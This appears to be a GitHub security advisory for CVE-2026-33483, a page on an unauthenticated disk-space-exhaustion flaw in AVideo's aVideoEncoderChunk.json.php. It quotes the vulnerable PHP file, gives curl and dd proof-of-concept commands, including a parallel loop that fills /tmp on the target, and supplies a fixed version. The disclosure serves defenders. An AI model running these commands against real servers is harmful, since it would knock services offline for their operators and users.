GHSA-VV7W-QF5C-734W

Vulnerability from github – Published: 2026-03-20 20:46 – Updated: 2026-03-25 18:49
VLAI
Summary
AVideo Affected by Unauthenticated Disk Space Exhaustion via Unlimited Temp File Creation in aVideoEncoderChunk.json.php
Details

Summary

The aVideoEncoderChunk.json.php endpoint is a completely standalone PHP script with no authentication, no framework includes, and no resource limits. An unauthenticated remote attacker can send arbitrary POST data which is written to persistent temp files in /tmp/ with no size cap, no rate limiting, and no cleanup mechanism. This allows trivial disk space exhaustion leading to denial of service of the entire server.

Details

The file objects/aVideoEncoderChunk.json.php (25 lines total) operates entirely outside the AVideo framework:

// objects/aVideoEncoderChunk.json.php — full file
<?php
header('Access-Control-Allow-Origin: *');           // Line 2: CORS wildcard
header('Content-Type: application/json');
$obj = new stdClass();
$obj->file = tempnam(sys_get_temp_dir(), 'YTPChunk_');  // Line 5: creates /tmp/YTPChunk_XXXXXX

$putdata = fopen("php://input", "r");              // Line 7: reads raw POST body
$fp = fopen($obj->file, "w");

while ($data = fread($putdata, 1024 * 1024)) {     // Line 12: 1MB chunks, no limit
    fwrite($fp, $data);
}

fclose($fp);
fclose($putdata);
sleep(1);
$obj->filesize = filesize($obj->file);

$json = json_encode($obj);
die($json);                                         // Line 25: returns {"file":"/tmp/YTPChunk_abc123","filesize":104857600}

The vulnerability chain:

  1. No authentication: The script includes no session handling, no require_once of the framework, no useVideoHashOrLogin(), no canUpload() — nothing. Compare with aVideoEncoder.json.php which includes configuration.php and calls authentication functions.

  2. No size limits: php://input is read until exhaustion. The effective limit is PHP's post_max_size, which AVideo's .htaccess has commented-out settings for 4GB (#php_value post_max_size 4G at line 536). Default AVideo installations recommend at least 100MB.

  3. No cleanup: A grep for YTPChunk_ across the entire codebase returns only the chunk file itself. No cron job, no garbage collection, no consumer that deletes files after processing. The temp files persist until the server is manually cleaned.

  4. Path disclosure: The response JSON includes the full filesystem temp path (e.g., /tmp/YTPChunk_abc123), revealing server directory structure.

  5. CORS wildcard: Access-Control-Allow-Origin: * on line 2 means any malicious webpage can trigger this attack via the visitor's browser, potentially distributing the attack across many source IPs.

  6. Public routing: .htaccess line 437 rewrites /aVideoEncoderChunk.json to this file, making it accessible at a clean URL.

PoC

Step 1: Confirm endpoint is accessible and unauthenticated

curl -s -X POST https://target/aVideoEncoderChunk.json \
  -H 'Content-Type: application/octet-stream' \
  --data-binary 'test'

Expected output:

{"file":"/tmp/YTPChunk_XXXXXX","filesize":4}

Step 2: Write a large temp file (100MB)

dd if=/dev/zero bs=1M count=100 2>/dev/null | \
  curl -s -X POST https://target/aVideoEncoderChunk.json \
  -H 'Content-Type: application/octet-stream' \
  --data-binary @-

Expected output:

{"file":"/tmp/YTPChunk_YYYYYY","filesize":104857600}

Step 3: Parallel disk exhaustion (10 concurrent 100MB requests = 1GB)

for i in $(seq 1 10); do
  dd if=/dev/zero bs=1M count=100 2>/dev/null | \
    curl -s -X POST https://target/aVideoEncoderChunk.json \
    -H 'Content-Type: application/octet-stream' \
    --data-binary @- &
done
wait

Step 4: Verify files persist (they are never cleaned up)

# On the server:
ls -la /tmp/YTPChunk_*
# All files remain indefinitely

Impact

  • Denial of Service: Filling /tmp/ causes cascading failures — PHP session handling breaks, MySQL temp tables fail, and system services relying on tmpfs crash. This can take down the entire server, not just AVideo.
  • No authentication barrier: Any anonymous internet user can trigger this attack.
  • Cross-origin exploitation: The CORS wildcard header allows any malicious website to use visitors' browsers as distributed attack proxies, bypassing IP-based rate limiting at the network level.
  • Information disclosure: The temp file path in the response reveals the server's filesystem layout.
  • Persistence: Created files are never cleaned up, so even a brief attack has lasting impact until manual intervention.

Recommended Fix

Replace objects/aVideoEncoderChunk.json.php with a version that includes authentication, size limits, and cleanup:

<?php
if (empty($global)) {
    $global = [];
}
require_once '../videos/configuration.php';

header('Content-Type: application/json');
allowOrigin(); // Use AVideo's configured CORS instead of wildcard

// Require authentication
$userObj = new User(0);
if (!User::canUpload()) {
    http_response_code(403);
    die(json_encode(['error' => true, 'msg' => 'Not authorized']));
}

// Enforce size limit (e.g., 200MB)
$maxSize = 200 * 1024 * 1024;
$contentLength = isset($_SERVER['CONTENT_LENGTH']) ? (int)$_SERVER['CONTENT_LENGTH'] : 0;
if ($contentLength > $maxSize) {
    http_response_code(413);
    die(json_encode(['error' => true, 'msg' => 'Payload too large']));
}

$obj = new stdClass();
$obj->file = tempnam(sys_get_temp_dir(), 'YTPChunk_');

$putdata = fopen("php://input", "r");
$fp = fopen($obj->file, "w");
$written = 0;

while ($data = fread($putdata, 1024 * 1024)) {
    $written += strlen($data);
    if ($written > $maxSize) {
        fclose($fp);
        fclose($putdata);
        unlink($obj->file);
        http_response_code(413);
        die(json_encode(['error' => true, 'msg' => 'Payload too large']));
    }
    fwrite($fp, $data);
}

fclose($fp);
fclose($putdata);

$obj->filesize = filesize($obj->file);
// Do not expose full filesystem path
$obj->file = basename($obj->file);

die(json_encode($obj));

Additionally, add a cleanup cron job or garbage collection to remove YTPChunk_* files older than a configurable timeout (e.g., 1 hour).

Severity
7.5 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33483"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T20:46:50Z",
    "nvd_published_at": "2026-03-23T15:16:34Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `aVideoEncoderChunk.json.php` endpoint is a completely standalone PHP script with no authentication, no framework includes, and no resource limits. An unauthenticated remote attacker can send arbitrary POST data which is written to persistent temp files in `/tmp/` with no size cap, no rate limiting, and no cleanup mechanism. This allows trivial disk space exhaustion leading to denial of service of the entire server.\n\n## Details\n\nThe file `objects/aVideoEncoderChunk.json.php` (25 lines total) operates entirely outside the AVideo framework:\n\n```php\n// objects/aVideoEncoderChunk.json.php \u2014 full file\n\u003c?php\nheader(\u0027Access-Control-Allow-Origin: *\u0027);           // Line 2: CORS wildcard\nheader(\u0027Content-Type: application/json\u0027);\n$obj = new stdClass();\n$obj-\u003efile = tempnam(sys_get_temp_dir(), \u0027YTPChunk_\u0027);  // Line 5: creates /tmp/YTPChunk_XXXXXX\n\n$putdata = fopen(\"php://input\", \"r\");              // Line 7: reads raw POST body\n$fp = fopen($obj-\u003efile, \"w\");\n\nwhile ($data = fread($putdata, 1024 * 1024)) {     // Line 12: 1MB chunks, no limit\n    fwrite($fp, $data);\n}\n\nfclose($fp);\nfclose($putdata);\nsleep(1);\n$obj-\u003efilesize = filesize($obj-\u003efile);\n\n$json = json_encode($obj);\ndie($json);                                         // Line 25: returns {\"file\":\"/tmp/YTPChunk_abc123\",\"filesize\":104857600}\n```\n\nThe vulnerability chain:\n\n1. **No authentication**: The script includes no session handling, no `require_once` of the framework, no `useVideoHashOrLogin()`, no `canUpload()` \u2014 nothing. Compare with `aVideoEncoder.json.php` which includes `configuration.php` and calls authentication functions.\n\n2. **No size limits**: `php://input` is read until exhaustion. The effective limit is PHP\u0027s `post_max_size`, which AVideo\u0027s `.htaccess` has commented-out settings for 4GB (`#php_value post_max_size 4G` at line 536). Default AVideo installations recommend at least 100MB.\n\n3. **No cleanup**: A grep for `YTPChunk_` across the entire codebase returns only the chunk file itself. No cron job, no garbage collection, no consumer that deletes files after processing. The temp files persist until the server is manually cleaned.\n\n4. **Path disclosure**: The response JSON includes the full filesystem temp path (e.g., `/tmp/YTPChunk_abc123`), revealing server directory structure.\n\n5. **CORS wildcard**: `Access-Control-Allow-Origin: *` on line 2 means any malicious webpage can trigger this attack via the visitor\u0027s browser, potentially distributing the attack across many source IPs.\n\n6. **Public routing**: `.htaccess` line 437 rewrites `/aVideoEncoderChunk.json` to this file, making it accessible at a clean URL.\n\n## PoC\n\n**Step 1: Confirm endpoint is accessible and unauthenticated**\n```bash\ncurl -s -X POST https://target/aVideoEncoderChunk.json \\\n  -H \u0027Content-Type: application/octet-stream\u0027 \\\n  --data-binary \u0027test\u0027\n```\nExpected output:\n```json\n{\"file\":\"/tmp/YTPChunk_XXXXXX\",\"filesize\":4}\n```\n\n**Step 2: Write a large temp file (100MB)**\n```bash\ndd if=/dev/zero bs=1M count=100 2\u003e/dev/null | \\\n  curl -s -X POST https://target/aVideoEncoderChunk.json \\\n  -H \u0027Content-Type: application/octet-stream\u0027 \\\n  --data-binary @-\n```\nExpected output:\n```json\n{\"file\":\"/tmp/YTPChunk_YYYYYY\",\"filesize\":104857600}\n```\n\n**Step 3: Parallel disk exhaustion (10 concurrent 100MB requests = 1GB)**\n```bash\nfor i in $(seq 1 10); do\n  dd if=/dev/zero bs=1M count=100 2\u003e/dev/null | \\\n    curl -s -X POST https://target/aVideoEncoderChunk.json \\\n    -H \u0027Content-Type: application/octet-stream\u0027 \\\n    --data-binary @- \u0026\ndone\nwait\n```\n\n**Step 4: Verify files persist (they are never cleaned up)**\n```bash\n# On the server:\nls -la /tmp/YTPChunk_*\n# All files remain indefinitely\n```\n\n## Impact\n\n- **Denial of Service**: Filling `/tmp/` causes cascading failures \u2014 PHP session handling breaks, MySQL temp tables fail, and system services relying on tmpfs crash. This can take down the entire server, not just AVideo.\n- **No authentication barrier**: Any anonymous internet user can trigger this attack.\n- **Cross-origin exploitation**: The CORS wildcard header allows any malicious website to use visitors\u0027 browsers as distributed attack proxies, bypassing IP-based rate limiting at the network level.\n- **Information disclosure**: The temp file path in the response reveals the server\u0027s filesystem layout.\n- **Persistence**: Created files are never cleaned up, so even a brief attack has lasting impact until manual intervention.\n\n## Recommended Fix\n\nReplace `objects/aVideoEncoderChunk.json.php` with a version that includes authentication, size limits, and cleanup:\n\n```php\n\u003c?php\nif (empty($global)) {\n    $global = [];\n}\nrequire_once \u0027../videos/configuration.php\u0027;\n\nheader(\u0027Content-Type: application/json\u0027);\nallowOrigin(); // Use AVideo\u0027s configured CORS instead of wildcard\n\n// Require authentication\n$userObj = new User(0);\nif (!User::canUpload()) {\n    http_response_code(403);\n    die(json_encode([\u0027error\u0027 =\u003e true, \u0027msg\u0027 =\u003e \u0027Not authorized\u0027]));\n}\n\n// Enforce size limit (e.g., 200MB)\n$maxSize = 200 * 1024 * 1024;\n$contentLength = isset($_SERVER[\u0027CONTENT_LENGTH\u0027]) ? (int)$_SERVER[\u0027CONTENT_LENGTH\u0027] : 0;\nif ($contentLength \u003e $maxSize) {\n    http_response_code(413);\n    die(json_encode([\u0027error\u0027 =\u003e true, \u0027msg\u0027 =\u003e \u0027Payload too large\u0027]));\n}\n\n$obj = new stdClass();\n$obj-\u003efile = tempnam(sys_get_temp_dir(), \u0027YTPChunk_\u0027);\n\n$putdata = fopen(\"php://input\", \"r\");\n$fp = fopen($obj-\u003efile, \"w\");\n$written = 0;\n\nwhile ($data = fread($putdata, 1024 * 1024)) {\n    $written += strlen($data);\n    if ($written \u003e $maxSize) {\n        fclose($fp);\n        fclose($putdata);\n        unlink($obj-\u003efile);\n        http_response_code(413);\n        die(json_encode([\u0027error\u0027 =\u003e true, \u0027msg\u0027 =\u003e \u0027Payload too large\u0027]));\n    }\n    fwrite($fp, $data);\n}\n\nfclose($fp);\nfclose($putdata);\n\n$obj-\u003efilesize = filesize($obj-\u003efile);\n// Do not expose full filesystem path\n$obj-\u003efile = basename($obj-\u003efile);\n\ndie(json_encode($obj));\n```\n\nAdditionally, add a cleanup cron job or garbage collection to remove `YTPChunk_*` files older than a configurable timeout (e.g., 1 hour).",
  "id": "GHSA-vv7w-qf5c-734w",
  "modified": "2026-03-25T18:49:45Z",
  "published": "2026-03-20T20:46:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-vv7w-qf5c-734w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33483"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/33d1bae6c731ef1682fcdc47b428313be073a5d1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo Affected by Unauthenticated Disk Space Exhaustion via Unlimited Temp File Creation in aVideoEncoderChunk.json.php"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.